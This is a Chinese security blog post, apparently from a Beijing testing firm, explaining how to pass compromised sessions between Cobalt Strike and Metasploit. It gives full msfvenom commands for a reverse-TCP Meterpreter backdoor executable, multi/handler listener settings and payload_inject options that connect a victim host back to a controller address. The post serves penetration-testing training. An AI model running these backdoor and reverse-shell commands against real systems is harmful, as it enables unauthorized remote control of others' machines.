大数跨境
0
0

CS与MSF联动

CS与MSF联动 卓识网安
2022-11-18
2
导读:卓识网安

CS与MSF联动
卓识网安

专注网络安全



01
CS与MSF

CobaltStrike(简称CS)是一款美国Red Team开发的渗透测试神器。Armitage是一个MetasploitFramework(简称MSF)的图形化界面工具,而Cobaltstrike大家可以理解其为Armitage的商业版。

早期版本CobaltSrtike依赖MetasploitFramework框架,而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver),服务端是一个,客户端可以有多个,团队可进行分布式协团操作。

CobalStrike 与 MetasploitFramework 均是渗透测试中不可缺少的利器,各有所长。前者更适合做稳控平台,后者则更擅长内网各类探测搜集与漏洞利用。两者更需要灵活的联动,各自相互依托,从而提升渗透的效率。



02
CS传递会话到MSF


CS操作



先在CS上新建一个监听器



利用CS生成一个后门文件

将后门文件放在受害主机中执行,之后受害主机就会上线到CS





MSF操作




在MetasploitFramework上开启一个meterpreter监听(reverse_http),用于接收CobaltStrike传递过来到会话

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.254.128   # msf所在主机的ip
set lport 5555     # msf所在主机自定义端口号
run

纯文本






会话传递



先在CS上创建一个监听(Foreign HTTP),IP和端口号需要与MSF中监听保持一致

然后在CS上选中要传递到会话,点击右键选择增加会话(Spawn),再选择刚刚创建的监听

上述完成后,就可以在MSF中看到CS传递过来会话了

03
MSF传递会话到CS


CS操作




在CS上新建一个监听器



MSF操作



通过msfvenom生成后门文件

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.254.128 LPORT=6666 -f exe > msfshell.exe

纯文本

启动msf,设置meterpreter监听用于接收后门文件反弹到shell

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.254.128 # msf所在主机的ip
set lport 7777 # msf所在主机自定义端口号,与后门文件中的一致
run

纯文本

将后门文件防止受害主机运行后,msf上会获得一个meterpreter的shell



会话传递



将获取到的MetasploitFramework会话挂至后台,会看到一个会话sessions id

调用 payload_inject 模块,将指定会话session id注入到新到CobaltStrike会话中

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http
set lhost 192.168.254.128   #CS服务端IP
set lport 80    #CS服务器监听的端口号
set DisablePayloadHandler True
set PrependMigrate true   
set session 1    #会话ID

纯文本


上述步骤完成后,在CobaltStrike中就可以看到MetasploitFramework传递过来到会话了



【声明】内容源于网络
0
0
卓识网安
北京卓识网安技术股份有限公司(原北京华电卓识信息安全测评技术中心有限公司)是一家致力于能源(电力)行业信息安全测评服务的独立第三方专业测评机构。
内容 69
粉丝 0
卓识网安 北京卓识网安技术股份有限公司(原北京华电卓识信息安全测评技术中心有限公司)是一家致力于能源(电力)行业信息安全测评服务的独立第三方专业测评机构。
总阅读31
粉丝0
内容69